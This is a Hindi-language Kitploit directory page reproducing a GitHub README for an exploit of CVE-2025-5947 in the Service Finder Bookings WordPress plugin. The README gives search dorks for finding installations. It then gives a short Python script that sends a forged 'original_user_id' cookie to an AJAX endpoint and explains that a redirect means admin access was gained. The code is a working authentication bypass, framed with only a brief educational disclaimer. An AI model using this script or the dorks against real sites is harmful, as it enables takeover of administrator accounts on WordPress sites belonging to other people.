Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-5947_Exploit — एक मिनी एक्सप्लॉइट जो Service Finder -Bookings प्लगइन WP के लिए है | Kitploit
उपकरण/GitHubGitHub/m4rgs/cve-2025-5947_exploit
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubm4rgs/cve-2025-5947_exploit

CVE-2025-5947_Exploit

एक मिनी एक्सप्लॉइट जो Service Finder -Bookings प्लगइन WP के लिए है

रिपॉजिटरी देखें
1200 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔍 वर्डप्रेस प्लगइन एक्सप्लॉइट — सर्विस फाइंडर (sf-booking)

अवलोकन

Service Finder प्लगइन वर्डप्रेस के लिए एक बुकिंग और सेवा प्रबंधन प्रणाली है।
अपनी लोकप्रियता और जटिलता के कारण, कुछ संस्करणों में अनप्रमाणित AJAX एंडपॉइंट्स या अनुचित एक्सेस नियंत्रण से संबंधित सुरक्षा समस्याएँ रही हैं।

यह README बताता है कि शोधकर्ता कैसे सुरक्षित रूप से इंस्टॉलेशन की पहचान कर सकते हैं और नैतिक प्रथाओं का पालन कर सकते हैं (dbr krk)।


संवेदनशील WP dorks

/wp-content/plugins/service-finder/

/wp-content/plugins/service-finder-bookings/

/wp-content/plugins/sf-booking/


एक्सप्लॉइट वर्कफ़्लो

⚠️ अस्वीकरण:
ये खोजें केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए हैं। अनधिकृत पहुँच या शोषण का प्रयास न करें।

import requests

url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
    'original_user_id': '1',
}

r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
  • 300-399: ✅ असुरक्षित! एडमिन पैनल पर एडमिन के रूप में रीडायरेक्ट
  • 400-499: ⚠️ क्लाइंट त्रुटि — अनुरोध अमान्य या अनधिकृत था, असुरक्षित नहीं

संदर्भ

  • WPScan प्लगइन डेटाबेस — https://wpscan.com/plugins/
  • राष्ट्रीय भेद्यता डेटाबेस (NVD) — https://nvd.nist.gov/
  • OWASP — Google Dorking / टोही तकनीकें
  • HackerOne प्रकटीकरण दिशानिर्देश — https://www.hackerone.com/disclosure-guidelines

लेखक

Taha Mounir


टूल डाउनलोड करें